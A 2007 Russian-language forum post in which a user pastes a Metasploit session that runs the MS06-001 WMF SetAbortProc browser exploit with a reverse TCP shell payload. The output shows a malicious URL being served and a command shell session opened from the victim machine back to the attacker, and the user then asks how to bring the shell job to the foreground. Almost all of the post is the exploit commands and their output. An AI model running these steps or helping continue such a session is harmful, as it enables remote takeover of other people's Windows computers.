Показать сообщение отдельно

  #26  
Старый 01.02.2007, 21:49
Angel_MakKedo
Новичок
Регистрация: 25.01.2007
Сообщений: 5
Провел на форуме:
21878

Репутация: 0
По умолчанию

quote:


msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
# Started reverse handler
# Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
# Server started.
# Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
# Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
msf exploit(ms06_001_wmf_setabortproc) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc


Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?
 
Ответить с цитированием